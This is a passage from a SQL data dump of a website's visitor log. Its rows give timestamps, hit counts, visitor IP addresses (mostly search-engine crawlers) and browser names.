,1,1,0,0,'217.182.132.80','other'),(133634,1500289417,3,3,0,0,'216.244.66.246','other'),(133635,1500289455,1,1,0,0,'95.132.11.106','firefox'),(133636,1500289549,1,1,0,0,'207.46.13.100','other'),(133637,1500289659,1,1,0,0,'95.108.213.34','other'),(133638,1500289780,1,1,0,0,'51.255.71.100','other'),(133639,1500289787,1,1,0,0,'8.29.198.26','other'),(133640,1500289866,1,1,0,0,'46.164.130.92','firefox'),(133641,1500290093,1,1,0,0,'92.112.29.133','firefox'),(133642,1500290385,1,1,0,0,'212.79.122.70','chrome'),(133643,1500290717,1,1,0,0,'141.8.142.164','other'),(133644,1500290977,1,1,0,0,'91.209.11.236','other'),(133645,1500290992,1,1,0,0,'51.255.65.8','other'),(133646,1500291010,1,1,0,0,'141.8.142.154','other'),(133647,1500291042,1,1,0,0,'217.182.132.186','other'),(133648,1500291091,1,1,0,0,'91.196.178.66','chrome'),(133649,1500291311,1,1,0,0,'180.76.15.33','other'),(133650,1500291541,1,1,0,0,'217.69.133.203','other'),(133651,1500291642,1,1,0,0,'217.182.132.155','other'),(133652,1500291770,1,1,0,0,'94.179.51.121','chrome'),(133653,1500291832,1,1,0,0,'66.249.76.91','chrome'),(133654,1500291963,1,1,0,0,'217.182.132.187','other'),(133655,1500291991,1,1,0,0,'37.54.166.61','firefox'),(133656,1500292226,1,1,0,0,'51.255.65.75','other'),(133657,1500292377,1,1,0,0,'141.8.142.154','other'),(133658,1500292728,1,1,0,0,'51.255.65.57','other'),(133659,1500292868,1,0,1,0,'66.249.76.89',''),(133660,1500293021,1,1,0,0,'5.255.253.63','other'),(133661,1500293258,1,1,0,0,'217.182.132.6','other'),(133662,1500293311,1,1,0,0,'37.53.141.99','firefox'),(133663,1500293539,1,1,0,0,'91.124.83.149','chrome'),(133664,1500293561,1,1,0,0,'217.182.132.52','other'),(133665,1500293940,1,1,0,0,'46.175.146.25','chrome'),(133666,1500294154,1,1,0,0,'141.8.142.164','other'),(133667,1500294241,1,1,0,0,'51.255.65.73','other'),(133668,1500294257,2,2,0,0,'216.244.66.237','other'),(133669,1500294300,1,1,0,0,'95.108.179.15','other'),(133670,1500294449,1,1,0,0,'51.255.65.30','other'),(133671,1500294607,1,1,0,0,'91.196.179.134','chrome'),(133672,1500295179,1,1,0,0,'51.255.65.28','other'),(133673,1500295305,1,1,0,0,'178.154.200.37','other'),(133674,1500295377,1,1,0,0,'91.124.83.184','chrome'),(133675,1500295462,1,1,0,0,'217.182.132.24','other'),(133676,1500295661,1,1,0,0,'217.182.132.65','other'),(133677,1500295800,1,1,0,0,'217.182.132.25','other'),(133678,1500295974,1,1,0,0,'91.196.178.66','chrome'),(133679,1500296006,2,2,0,0,'216.244.66.194','other'),(133680,1500296122,1,1,0,0,'51.255.71.122','other'),(133681,1500296291,1,1,0,0,'151.80.27.116','other'),(133682,1500296406,1,1,0,0,'91.209.11.236','other'),(133683,1500296561,2,2,0,0,'207.46.13.100','other'),(133684,1500296594,3,3,0,0,'173.208.139.226','firefox'),(133685,1500296813,1,1,0,0,'51.255.71.115','other'),(133686,1500296840,1,1,0,0,'217.182.132.171','other'),(133687,1500296906,1,1,0,0,'137.74.207.108','other'),(133688,1500297686,1,1,0,0,'51.255.65.84','other'),(133689,1500297847,1,1,0,0,'51.255.65.95','other'),(133690,1500297885,1,1,0,0,'141.8.142.164','other'),(133691,1500298137,1,1,0,0,'87.250.224.7','other'),(133692,1500298249,1,1,0,0,'217.182.132.27','other'),(133693,1500298506,1,1,0,0,'87.250.224.18','other'),(133694,1500298599,1,1,0,0,'217.182.132.192','other'),(133695,1500298856,1,1,0,0,'51.255.65.91','other'),(133696,1500299168,1,1,0,0,'217.182.132.55','other'),(133697,1500299224,1,1,0,0,'217.182.132.82','other'),(133698,1500299263,2,2,0,0,'216.244.66.246','other'),(133699,1500299408,1,1,0,0,'217.182.132.153','other'),(133700,1500299822,1,1,0,0,'217.182.132.14','other'),(133701,1500300289,1,1,0,0,'51.255.65.67','other'),(133702,1500300615,1,1,0,0,'8.29.198.27','other'),(133703,1500300693,1,1,0,0,'217.69.133.6','other'),(133704,1500300965,1,1,0,0,'217.182.132.172','other'),(133705,1500301062,1,1,0,0,'51.255.65.83','other'),(133706,1500301411,1,1,0,0,'31.43.22.76','chrome'),(133707,1500301697,1,1,0,0,'137.74.207.120','other'),(133708,1500302294,1,1,0,0,'217.182.132.79','other'),(133709,1500302429,1,1,0,0,'217.182.132.33','other'),(133710,1500302618,1,1,0,0,'51.255.65.32','other'),(133711,1500303203,1,1,0,0,'95.108.179.15','other'),(133712,1500303257,1,1,0,0,'217.182.132.181','other'),(133713,1500303811,1,1,0,0,'37.55.203.69','chrome'),(133714,1500303843,1,1,0,0,'217.182.132.52','other'),(133715,1500303945,1,1,0,0,'51.255.65.21','other'),(133716,1500304433,1,1,0,0,'141.8.142.154','other'),(133717,1500304489,1,1,0,0,'51.255.65.68','other'),(133718,1500304556,1,0,1,0,'66.249.76.137',''),(133719,1500305057,1,1,0,0,'216.244.66.246','other'),(133720,1500305483,1,1,0,0,'51.255.65.86','other'),(133721,1500305814,2,2,0,0,'216.244.66.194','other'),(133722,1500306098,1,1,0,0,'217.182.132.19','other'),(133723,1500306216,1,1,0,0,'51.255.65.62','other'),(133724,1500306922,1,1,0,0,'217.182.132.31','other'),(133725,1500307035,1,1,0,0,'217.182.132.4','other'),(133726,1500307064,1,1,0,0,'51.255.65.19','other'),(133727,1500307344,1,1,0,0,'91.209.11.236','other'),(133728,1500307354,1,1,0,0,'217.182.132.81','other'),(133729,1500307389,1,0,1,0,'66.249.66.76',''),(133730,1500307455,1,1,0,0,'87.250.224.7','other'),(133731,1500307833,1,0,1,0,'68.180.230.48',''),(133732,1500307867,2,2,0,0,'217.69.133.217','other'),(133733,1500307869,1,1,0,0,'217.69.133.219','other'),(133734,1500308063,1,1,0,0,'217.182.132.33','other'),(133735,1500308321,1,1,0,0,'180.76.15.30','other'),(133736,1500308551,1,1,0,0,'51.255.65.47','other'),(133737,1500308711,1,1,0,0,'51.255.65.93','other'),(133738,1500309188,4,4,0,0,'216.244.66.246','other'),(133739,1500309251,1,1,0,0,'66.249.66.157','chrome'),(133740,1500309846,1,1,0,0,'178.92.154.151','firefox'),(133741,1500310167,1,1,0,0,'217.182.132.97','other'),(133742,1500310226,1,1,0,0,'217.182.132.73','other'),(133743,1500310367,1,1,0,0,'137.74.201.108','other'),(133744,1500310998,1,1,0,0,'137.74.207.170','other'),(133745,1500311312,1,1,0,0,'91.209.11.236','other'),(133746,1500311452,1,1,0,0,'8.29.198.25','other'),(133747,1500311514,1,1,0,0,'207.46.13.100','other'),(133748,1500311550,1,1,0,0,'217.182.132.91','other'),(133749,1500311571,1,1,0,0,'217.182.132.30','other'),(133750,1500311601,1,1,0,0,'51.255.65.71','other'),(133751,1500312186,1,1,0,0,'51.255.71.128','other'),(133752,1500312971,1,1,0,0,'51.255.65.19','other'),(133753,1500312978,1,1,0,0,'51.255.71.113','other'),(133754,1500313005,1,1,0,0,'51.255.65.11','other'),(133755,1500313233,1,1,0,0,'82.193.105.118','firefox'),(133756,1500313362,1,1,0,0,'5.255.253.63','other'),(133757,1500313662,1,1,0,0,'217.182.132.83','other'),(133758,1500313927,1,1,0,0,'95.108.179.15','other'),(133759,1500314186,1,1,0,0,'217.182.132.90','other'),(133760,1500314359,1,1,0,0,'46.201.112.125','chrome'),(133761,1500314360,1,1,0,0,'217.182.132.82','other'),(133762,1500314676,1,1,0,0,'51.255.71.119','other'),(133763,1500314714,1,1,0,0,'91.209.11.236','other'),(133764,1500314726,1,1,0,0,'217.182.132.148','other'),(133765,1500315322,1,1,0,0,'66.249.66.75','chrome'),(133766,1500315482,1,1,0,0,'66.249.76.131','chrome'),(133767,1500315518,1,1,0,0,'51.255.71.125','other'),(133768,1500315721,1,0,1,0,'68.180.230.48',''),(133769,1500315797,1,1,0,0,'51.255.71.130','other'),(133770,1500315825,1,1,0,0,'51.255.65.33','other'),(133771,1500315845,1,1,0,0,'188.32.176.227','msie'),(133772,1500315851,1,1,0,0,'77.37.180.165','msie'),(133773,1500315889,1,1,0,0,'217.182.132.72','other'),(133774,1500315959,2,2,0,0,'95.108.179.15','other'),(133775,1500316484,1,1,0,0,'217.182.132.77','other'),(133776,1500316685,1,1,0,0,'216.244.66.246','other'),(133777,1500316833,1,1,0,0,'91.209.11.236','other'),(133778,1500316962,1,1,0,0,'207.46.13.100','other'),(133779,1500317270,1,1,0,0,'217.182.132.80','other'),(133780,1500317281,1,1,0,0,'51.255.71.100','other'),(133781,1500317917,1,1,0,0,'217.182.132.175','other'),(133782,1500318406,1,1,0,0,'51.255.65.54','other'),(133783,1500318431,1,1,0,0,'217.182.132.29','other'),(133784,1500318485,1,1,0,0,'51.255.71.119','other'),(133785,1500318939,1,1,0,0,'66.249.76.131','chrome'),(133786,1500319043,10,10,0,0,'69.58.178.58','other'),(133787,1500320265,1,0,1,0,'66.249.76.131',''),(133788,1500320326,1,1,0,0,'51.255.65.7','other'),(133789,1500320361,1,1,0,0,'51.255.65.46','other'),(133790,1500320837,1,1,0,0,'193.194.127.228','chrome'),(133791,1500320885,1,1,0,0,'51.255.65.47','other'),(133792,1500321217,1,1,0,0,'66.249.66.75','chrome'),(133793,1500321804,1,1,0,0,'180.76.15.163','other'),(133794,1500321876,1,1,0,0,'217.182.132.28','other'),(133795,1500322088,1,1,0,0,'95.108.179.15','other'),(133796,1500322135,3,3,0,0,'216.244.66.246','other'),(133797,1500322291,1,1,0,0,'8.29.198.25','other'),(133798,1500322496,1,1,0,0,'5.255.253.63','other'),(133799,1500322562,1,1,0,0,'217.182.132.154','other'),(133800,1500322833,1,1,0,0,'217.182.132.156','other'),(133801,1500322871,1,1,0,0,'51.255.65.74','other'),(133802,1500323159,1,1,0,0,'66.249.76.137','chrome'),(133803,1500323207,1,1,0,0,'91.209.11.236','other'),(133804,1500323309,1,1,0,0,'216.244.66.237','other'),(133805,1500323330,2,2,0,0,'217.182.132.149','other'),(133806,1500323511,1,1,0,0,'51.255.65.57','other'),(133807,1500323580,1,1,0,0,'141.8.142.164','other'),(133808,1500323683,1,1,0,0,'51.255.65.19','other'),(133809,1500323770,1,1,0,0,'95.108.179.15','other'),(133810,1500324181,1,1,0,0,'216.244.66.246','other'),(133811,1500324476,1,1,0,0,'217.182.132.148','other'),(133812,1500324494,1,1,0,0,'141.8.142.164','other'),(133813,1500324547,2,2,0,0,'91.209.11.236','other'),(133814,1500324586,1,1,0,0,'217.182.132.69','other'),(133815,1500325145,1,1,0,0,'217.182.132.190','other'),(133816,1500325534,1,1,0,0,'87.250.224.7','other'),(133817,1500325574,1,1,0,0,'217.182.132.23','other'),(133818,1500325594,1,1,0,0,'51.255.65.64','other'),(133819,1500325600,1,1,0,0,'51.255.71.113','other'),(133820,1500325898,1,1,0,0,'51.255.65.76','other'),(133821,1500325984,3,3,0,0,'216.244.66.194','other'),(133822,1500326122,1,1,0,0,'137.74.207.116','other'),(133823,1500326345,1,1,0,0,'141.8.142.154','other'),(133824,1500326363,1,1,0,0,'217.182.132.18','other'),(133825,1500326500,1,1,0,0,'51.255.71.132','other'),(133826,1500326648,1,1,0,0,'95.108.179.15','other'),(133827,1500326737,1,1,0,0,'217.182.132.97','other'),(133828,1500326776,1,1,0,0,'51.255.64.106','other'),(133829,1500327241,1,1,0,0,'51.255.65.20','other'),(133830,1500327293,1,1,0,0,'95.108.213.34','other'),(133831,1500327497,1,1,0,0,'51.255.65.50','other'),(133832,1500327505,1,1,0,0,'217.182.132.94','other'),(133833,1500327682,1,1,0,0,'95.108.179.15','other'),(133834,1500328233,1,1,0,0,'164.132.162.188','other'),(133835,1500328911,1,1,0,0,'87.250.224.7','other'),(133836,1500328965,1,1,0,0,'51.255.65.12','other'),(133837,1500328983,1,0,1,0,'66.249.76.137',''),(133838,1500329112,3,3,0,0,'95.108.179.15','other'),(133839,1500329561,1,1,0,0,'66.249.76.131','chrome'),(133840,1500329828,2,2,0,0,'91.209.11.236','other'),(133842,1500329863,1,1,0,0,'141.8.142.164','other'),(133843,1500329904,1,1,0,0,'162.210.196.130','other'),(133844,1500329916,1,1,0,0,'51.255.65.8','other'),(133845,1500330654,1,1,0,0,'217.182.132.53','other'),(133846,1500330663,2,2,0,0,'141.8.142.154','other'),(133847,1500330748,1,1,0,0,'95.108.213.34','other'),(133848,1500330840,1,1,0,0,'91.209.11.236','other'),(133849,1500331032,1,1,0,0,'217.182.132.86','other'),(133850,1500331866,2,2,0,0,'62.210.203.161','chrome'),(133851,1500331986,1,1,0,0,'216.244.66.246','other'),(133852,1500332661,1,1,0,0,'217.69.133.5','other'),(133853,1500332830,2,2,0,0,'95.108.213.34','other'),(133854,1500332956,1,1,0,0,'51.255.65.74','other'),(133855,1500333014,1,1,0,0,'5.255.253.63','other'),(133856,1500333042,1,1,0,0,'51.255.65.8','other'),(133857,1500333131,1,1,0,0,'8.29.198.26','other'),(133858,1500333222,3,3,0,0,'216.244.66.194','other'),(133859,1500333451,1,1,0,0,'87.250.224.7','other'),(133860,1500334288,1,1,0,0,'91.209.11.236','other'),(133861,1500334442,1,1,0,0,'87.250.224.7','other'),(133862,1500334563,1,1,0,0,'95.108.213.34','other'),(133863,1500334842,1,1,0,0,'51.255.65.88','other'),(133864,1500334868,1,1,0,0,'81.1.242.33','other'),(133865,1500334942,1,1,0,0,'164.132.164.180','other'),(133866,1500335695,1,1,0,0,'51.255.65.40','other'),(133867,1500335879,1,1,0,0,'51.255.71.98','other'),(133868,1500335956,1,1,0,0,'217.69.133.9','other'),(133869,1500336060,1,1,0,0,'51.255.71.115','other'),(133870,1500336112,2,2,0,0,'81.1.242.33','other'),(133872,1500336530,1,1,0,0,'95.108.213.34','other'),(133873,1500336727,1,1,0,0,'91.209.11.236','other'),(133874,1500336843,2,2,0,0,'217.182.132.179','other'),(133875,1500337086,2,2,0,0,'141.8.142.164','other'),(133876,1500337344,1,1,0,0,'217.69.133.4','other'),(133877,1500337706,1,1,0,0,'51.255.71.128','other'),(133878,1500337865,1,1,0,0,'217.182.132.150','other'),(133879,1500337913,1,1,0,0,'217.182.132.16','other'),(133880,1500338020,1,1,0,0,'46.48.13.161','chrome'),(133881,1500338450,1,1,0,0,'51.255.65.22','other'),(133882,1500338464,1,1,0,0,'66.249.76.93','chrome'),(133883,1500338486,1,1,0,0,'217.69.133.203','other'),(133884,1500338848,1,1,0,0,'51.255.65.39','other'),(133885,1500339442,1,1,0,0,'95.108.179.21','other'),(133886,1500339566,1,1,0,0,'51.255.65.35','other'),(133887,1500340246,1,1,0,0,'51.255.65.49','other'),(133888,1500340395,3,3,0,0,'216.244.66.194','other'),(133889,1500340403,1,1,0,0,'217.182.132.25','other'),(133890,1500340540,1,1,0,0,'141.8.142.164','other'),(133891,1500340837,1,1,0,0,'217.182.132.14','other'),(133892,1500340891,2,2,0,0,'216.244.66.246','other'),(133893,1500341056,1,1,0,0,'137.74.207.108','other'),(133894,1500341116,1,1,0,0,'51.255.65.62','other'),(133895,1500341324,1,1,0,0,'66.249.76.137','chrome'),(133896,1500341457,1,1,0,0,'95.108.213.7','other'),(133897,1500341773,1,1,0,0,'217.182.132.87','other'),(133898,1500341956,1,1,0,0,'216.244.66.246','other'),(133899,1500342009,1,1,0,0,'95.108.213.34','other'),(133900,1500342174,1,1,0,0,'137.74.207.109','other'),(133901,1500342269,2,2,0,0,'91.209.11.236','other'),(133902,1500342288,1,0,1,0,'68.180.230.48',''),(133903,1500342418,1,1,0,0,'51.255.65.27','other'),(133904,1500342717,1,1,0,0,'66.249.76.93','chrome'),(133905,1500342756,1,1,0,0,'51.255.65.83','other'),(133906,1500343194,2,2,0,0,'217.69.133.4','other'),(133907,1500343389,1,1,0,0,'217.182.132.87','other'),(133908,1500343524,1,0,1,0,'66.249.66.155',''),(133909,1500343967,1,1,0,0,'8.29.198.27','other'),(133910,1500344247,1,1,0,0,'217.182.132.94','other'),(133911,1500344546,1,1,0,0,'51.255.71.130','other'),(133912,1500344599,1,1,0,0,'95.108.179.15','other'),(133913,1500345020,1,1,0,0,'141.8.142.164','other'),(133914,1500345294,1,1,0,0,'87.250.224.7','other'),(133915,1500345685,1,1,0,0,'91.209.11.236','other'),(133916,1500345740,1,1,0,0,'5.255.253.81','other'),(133917,1500345773,1,1,0,0,'5.255.253.63','other'),(133918,1500345779,1,1,0,0,'95.108.181.8','other'),(133919,1500345780,1,1,0,0,'217.182.132.60','other'),(133920,1500346673,1,1,0,0,'51.255.65.58','other'),(133921,1500346988,1,0,1,0,'68.180.230.48',''),(133922,1500347365,1,1,0,0,'66.249.76.137','chrome'),(133923,1500347800,1,1,0,0,'141.8.142.42','other'),(133924,1500347832,1,0,1,0,'66.249.76.131',''),(133925,1500347869,1,1,0,0,'141.8.142.91','other'),(133926,1500347958,1,1,0,0,'51.255.65.21','other'),(133927,1500348089,1,1,0,0,'178.154.149.1','other'),(133928,1500348117,1,0,1,0,'66.249.76.93',''),(133929,1500348409,1,1,0,0,'93.158.152.77','other'),(133930,1500348435,1,1,0,0,'91.209.11.236','other'),(133931,1500348935,1,1,0,0,'207.46.13.71','other'),(133932,1500349607,1,1,0,0,'87.250.224.8','other'),(133933,1500349709,1,1,0,0,'66.249.66.155','chrome'),(133934,1500350204,2,2,0,0,'216.244.66.194','other'),(133935,1500350442,1,1,0,0,'217.182.132.91','other'),(133936,1500350662,1,1,0,0,'46.48.13.161','chrome'),(133937,1500350754,1,1,0,0,'95.108.179.15','other'),(133938,1500350793,1,1,0,0,'93.158.152.79','other'),(133939,1500351487,1,1,0,0,'91.209.11.236','other'),(133940,1500351630,1,1,0,0,'178.154.189.3','other'),(133941,1500351633,1,1,0,0,'178.154.189.21','other'),(133942,1500351698,1,1,0,0,'87.250.224.18','other'),(133943,1500352065,1,1,0,0,'217.182.132.173','other'),(133944,1500352222,2,2,0,0,'216.244.66.246','other'),(133945,1500352267,1,1,0,0,'93.158.152.60','other'),(133946,1500352428,1,1,0,0,'46.48.13.161','chrome'),(133947,1500352448,1,1,0,0,'51.255.65.20','other'),(133948,1500352489,1,1,0,0,'91.196.178.70','firefox'),(133949,1500352925,1,1,0,0,'51.255.71.130','other'),(133950,1500353598,1,1,0,0,'217.182.132.20','other'),(133951,1500353719,3,3,0,0,'216.244.66.194','other'),(133952,1500353892,1,1,0,0,'51.255.65.8','other'),(133953,1500354189,1,0,1,0,'68.180.230.48',''),(133954,1500354495,1,1,0,0,'37.52.161.59','chrome'),(133955,1500354796,1,1,0,0,'8.29.198.26','other'),(133956,1500354875,1,1,0,0,'95.108.179.15','other'),(133957,1500354887,1,1,0,0,'137.74.201.100','other'),(133958,1500355362,9,9,0,0,'69.30.213.202','other'),(133959,1500355390,1,1,0,0,'217.182.132.71','other'),(133960,1500355447,1,1,0,0,'51.255.65.33','other'),(133961,1500355525,1,1,0,0,'91.209.11.236','other'),(133962,1500355647,1,1,0,0,'141.8.142.154','other'),(133963,1500355936,1,0,1,0,'68.180.230.48',''),(133964,1500356194,1,1,0,0,'51.255.65.51','other'),(133965,1500356563,1,1,0,0,'217.69.133.2','other'),(133966,1500356832,1,1,0,0,'91.209.11.236','other'),(133967,1500356922,1,1,0,0,'95.108.213.34','other'),(133968,1500357090,1,1,0,0,'217.182.132.69','other'),(133969,1500357351,1,1,0,0,'51.255.71.127','other'),(133970,1500357539,1,1,0,0,'141.8.142.154','other'),(133971,1500357567,1,1,0,0,'216.244.66.194','other'),(133972,1500358224,1,0,1,0,'68.180.230.48',''),(133973,1500358738,1,0,1,0,'66.249.76.137',''),(133974,1500358969,1,1,0,0,'5.255.253.63','other'),(133975,1500359046,1,1,0,0,'95.108.213.7','other'),(133976,1500359191,1,1,0,0,'66.102.9.27','chrome'),(133977,1500361889,1,1,0,0,'87.250.224.24','other'),(133978,1500361975,2,2,0,0,'216.244.66.237','other'),(133979,1500362022,1,1,0,0,'91.204.60.215','chrome'),(133980,1500362031,1,1,0,0,'95.108.179.15','other'),(133981,1500362376,1,1,0,0,'216.244.66.246','other'),(133982,1500362398,2,2,0,0,'62.210.203.161','chrome'),(133983,1500362617,1,1,0,0,'141.8.142.154','other'),(133984,1500363054,1,1,0,0,'87.250.224.7','other'),(133985,1500363095,1,1,0,0,'95.135.61.100','chrome'),(133986,1500363528,1,1,0,0,'91.196.178.66','chrome'),(133987,1500363637,2,2,0,0,'91.196.178.67','firefox'),(133988,1500363977,1,1,0,0,'216.244.66.246','other'),(133989,1500364146,1,0,1,0,'66.249.76.91',''),(133990,1500364417,2,2,0,0,'87.250.224.18','other'),(133991,1500364477,1,1,0,0,'66.249.76.89','chrome'),(133992,1500364534,4,4,0,0,'54.165.59.7','other'),(133993,1500364585,1,0,1,0,'66.249.76.137',''),(133994,1500364722,1,1,0,0,'82.145.221.24','opera'),(133995,1500365482,1,1,0,0,'91.209.11.236','other'),(133996,1500365624,1,1,0,0,'8.29.198.25','other'),(133997,1500365787,1,1,0,0,'95.108.213.34','other'),(133998,1500365824,2,2,0,0,'216.244.66.194','other'),(133999,1500366480,2,2,0,0,'91.209.11.236','other'),(134000,1500366772,1,1,0,0,'46.48.13.161','chrome'),(134001,1500366791,1,1,0,0,'217.12.196.146','firefox'),(134002,1500367365,1,1,0,0,'95.108.179.15','other'),(134003,1500367518,1,1,0,0,'91.196.178.129','firefox'),(134004,1500367960,1,1,0,0,'91.204.60.215','chrome'),(134005,1500368427,1,1,0,0,'5.255.253.63','other'),(134006,1500369645,2,2,0,0,'91.209.11.236','other'),(134007,1500369764,1,1,0,0,'141.8.142.154','other'),(134008,1500371020,2,2,0,0,'216.244.66.194','other'),(134009,1500371386,1,1,0,0,'91.209.11.236','other'),(134010,1500371477,2,2,0,0,'5.9.63.162','other'),(134011,1500371734,1,1,0,0,'87.250.224.7','other'),(134012,1500371788,1,1,0,0,'141.8.142.154','other'),(134013,1500371823,1,1,0,0,'37.55.203.69','chrome'),(134014,1500372092,1,1,0,0,'178.151.156.150','chrome'),(134015,1500372918,1,1,0,0,'195.10.210.49','chrome'),(134016,1500373084,1,1,0,0,'95.108.213.34','other'),(134017,1500373173,1,1,0,0,'46.48.13.161','chrome'),(134018,1500373424,1,1,0,0,'141.8.142.154','other'),(134019,1500373431,1,1,0,0,'91.209.11.236','other'),(134020,1500373662,1,1,0,0,'87.250.224.18','other'),(134021,1500374117,1,1,0,0,'37.73.216.113','chrome'),(134022,1500374196,1,1,0,0,'66.249.66.155','chrome'),(134023,1500374420,2,2,0,0,'95.108.213.34','other'),(134024,1500375072,2,2,0,0,'216.244.66.246','other'),(134025,1500375091,1,1,0,0,'217.182.132.4','other'),(134026,1500375204,1,1,0,0,'91.209.11.236','other'),(134027,1500375371,1,1,0,0,'164.132.162.159','other'),(134028,1500375958,1,1,0,0,'137.74.207.102','other'),(134029,1500375965,1,1,0,0,'46.48.13.161','chrome'),(134030,1500376145,1,1,0,0,'51.255.71.116','other'),(134031,1500376317,1,1,0,0,'137.74.207.101','other'),(134032,1500376331,1,1,0,0,'137.74.207.164','other'),(134033,1500376459,1,1,0,0,'8.29.198.27','other'),(134034,1500376639,1,1,0,0,'217.182.132.84','other'),(134035,1500377565,1,1,0,0,'194.44.79.183','chrome'),(134036,1500377568,2,2,0,0,'91.196.178.67','firefox'),(134037,1500378038,1,1,0,0,'94.178.108.242','opera'),(134038,1500378457,1,1,0,0,'217.182.132.64','other'),(134039,1500378479,1,1,0,0,'141.8.142.164','other'),(134040,1500378535,1,1,0,0,'217.69.133.4','other'),(134041,1500378651,1,1,0,0,'91.196.178.68','firefox'),(134042,1500378977,2,2,0,0,'91.196.177.46','chrome'),(134043,1500379113,1,1,0,0,'164.132.162.155','other'),(134044,1500379383,1,1,0,0,'217.182.132.76','other'),(134045,1500379625,1,1,0,0,'217.182.132.20','other'),(134046,1500379890,1,1,0,0,'217.182.132.97','other'),(134047,1500379903,1,1,0,0,'207.46.13.81','other'),(134048,1500380142,1,1,0,0,'95.108.213.34','other'),(134049,1500380165,1,1,0,0,'91.196.178.169','chrome'),(134050,1500380196,1,1,0,0,'188.166.83.210','chrome'),(134051,1500380223,1,1,0,0,'5.255.253.63','other'),(134052,1500380264,1,1,0,0,'91.196.178.66','chrome'),(134053,1500380631,1,1,0,0,'37.73.254.22','firefox'),(134054,1500380843,1,1,0,0,'216.244.66.194','other'),(134055,1500381076,1,1,0,0,'217.182.132.53','other'),(134056,1500381319,1,1,0,0,'87.250.224.7','other'),(134057,1500382174,1,1,0,0,'91.209.11.236','other'),(134058,1500382644,1,1,0,0,'51.255.65.19','other'),(134059,1500382810,1,1,0,0,'95.108.213.34','other'),(134060,1500382901,1,1,0,0,'217.69.133.2','other'),(134061,1500382945,2,2,0,0,'95.135.231.74','firefox'),(134062,1500383068,1,1,0,0,'217.182.132.90','other'),(134063,1500383122,1,1,0,0,'87.250.224.8','other'),(134064,1500383127,2,2,0,0,'216.244.66.246','other'),(134065,1500383363,1,1,0,0,'217.182.132.28','other'),(134066,1500383557,1,1,0,0,'87.250.224.7','other'),(134067,1500383729,1,1,0,0,'51.255.65.40','other'),(134068,1500383881,1,1,0,0,'51.255.65.71','other'),(134069,1500384234,1,1,0,0,'141.8.142.154','other'),(134070,1500384297,1,1,0,0,'91.196.178.66','chrome'),(134071,1500384403,1,1,0,0,'51.255.65.38','other'),(134072,1500384534,1,1,0,0,'91.196.178.162','chrome'),(134073,1500384537,1,1,0,0,'217.182.132.28','other'),(134074,1500384543,1,1,0,0,'91.196.178.66','firefox'),(134075,1500384594,1,1,0,0,'137.74.207.120','other'),(134076,1500384682,1,1,0,0,'95.108.179.15','other'),(134077,1500384759,1,1,0,0,'46.201.168.94','chrome'),(134078,1500385158,1,1,0,0,'141.8.142.164','other'),(134079,1500385176,1,1,0,0,'95.108.213.34','other'),(134080,1500385309,1,1,0,0,'207.46.13.81','other'),(134081,1500385607,1,1,0,0,'91.196.178.66','firefox'),(134082,1500385848,1,1,0,0,'217.182.132.175','other'),(134083,1500386453,2,2,0,0,'141.8.142.164','other'),(134084,1500386475,1,1,0,0,'141.8.142.154','other'),(134085,1500386616,1,1,0,0,'51.255.65.33','other'),(134086,1500386944,3,3,0,0,'216.244.66.194','other'),(134087,1500387286,1,1,0,0,'8.29.198.27','other'),(134088,1500387444,1,1,0,0,'51.255.65.43','other'),(134089,1500387639,1,1,0,0,'141.8.142.154','other'),(134090,1500387858,1,1,0,0,'5.255.253.63','other'),(134091,1500387861,1,1,0,0,'5.255.253.43','other'),(134092,1500388163,1,1,0,0,'51.255.65.58','other'),(134093,1500388512,1,1,0,0,'141.8.142.42','other'),(134094,1500388841,1,1,0,0,'217.182.132.95','other'),(134095,1500388851,1,1,0,0,'51.255.65.54','other'),(134096,1500389315,1,1,0,0,'141.8.142.38','other'),(134097,1500389404,1,1,0,0,'137.74.207.120','other'),(134098,1500389451,1,1,0,0,'51.255.65.11','other'),(134099,1500389762,1,1,0,0,'51.255.65.2','other'),(134100,1500390069,1,1,0,0,'217.182.132.183','other'),(134101,1500390116,1,0,1,0,'68.180.230.48',''),(134102,1500390184,1,1,0,0,'217.182.132.172','other'),(134103,1500390493,1,1,0,0,'217.182.132.90','other'),(134104,1500390588,2,2,0,0,'91.196.179.138','chrome'),(134105,1500390602,2,2,0,0,'62.210.203.161','chrome'),(134106,1500390609,1,1,0,0,'137.74.207.188','other'),(134107,1500390745,1,1,0,0,'178.154.189.21','other'),(134108,1500390748,1,1,0,0,'95.108.213.8','other'),(134109,1500390821,1,1,0,0,'141.8.142.154','other'),(134110,1500390853,1,0,1,0,'66.249.76.109',''),(134111,1500390860,1,1,0,0,'87.250.224.16','other'),(134112,1500390913,1,1,0,0,'87.250.224.4','other'),(134113,1500391118,1,1,0,0,'51.255.71.122','other'),(134114,1500391220,1,1,0,0,'51.255.71.125','other'),(134115,1500391288,1,1,0,0,'51.255.65.65','other'),(134116,1500391387,1,1,0,0,'217.182.132.171','other'),(134117,1500391408,1,1,0,0,'51.255.65.19','other'),(134118,1500391416,1,1,0,0,'216.244.66.237','other'),(134119,1500391568,1,1,0,0,'217.182.132.21','other'),(134120,1500391701,1,1,0,0,'51.255.65.33','other'),(134121,1500391707,1,1,0,0,'141.8.142.48','other'),(134122,1500391724,1,1,0,0,'217.182.132.15','other'),(134123,1500391833,1,1,0,0,'216.244.66.246','other'),(134124,1500392074,1,1,0,0,'217.182.132.66','other'),(134125,1500392127,1,1,0,0,'51.255.65.46','other'),(134126,1500392442,2,2,0,0,'216.244.66.194','other'),(134127,1500392491,1,1,0,0,'217.182.132.28','other'),(134128,1500392678,1,1,0,0,'180.76.15.147','other'),(134129,1500392962,1,1,0,0,'141.8.142.164','other'),(134130,1500393249,1,1,0,0,'87.250.224.18','other'),(134131,1500393343,1,1,0,0,'137.74.207.170','other'),(134132,1500393804,2,2,0,0,'216.244.66.246','other'),(134133,1500394104,1,0,1,0,'66.249.76.91',''),(134134,1500394402,2,2,0,0,'31.43.3.191','chrome'),(134135,1500394719,1,1,0,0,'87.250.224.7','other'),(134136,1500394722,1,1,0,0,'216.244.66.194','other'),(134137,1500394735,1,1,0,0,'66.249.66.75','chrome'),(134138,1500394840,1,1,0,0,'91.209.11.236','other'),(134139,1500395060,1,1,0,0,'46.211.113.44','other'),(134140,1500395254,1,1,0,0,'95.108.213.32','other'),(134141,1500395357,1,1,0,0,'95.133.156.252','firefox'),(134142,1500395540,1,1,0,0,'141.8.142.154','other'),(134143,1500395694,1,1,0,0,'217.182.132.56','other'),(134144,1500396095,2,2,0,0,'62.210.203.161','chrome'),(134145,1500396121,1,1,0,0,'51.255.65.87','other'),(134146,1500396451,1,1,0,0,'51.255.65.90','other'),(134147,1500396479,1,1,0,0,'217.182.1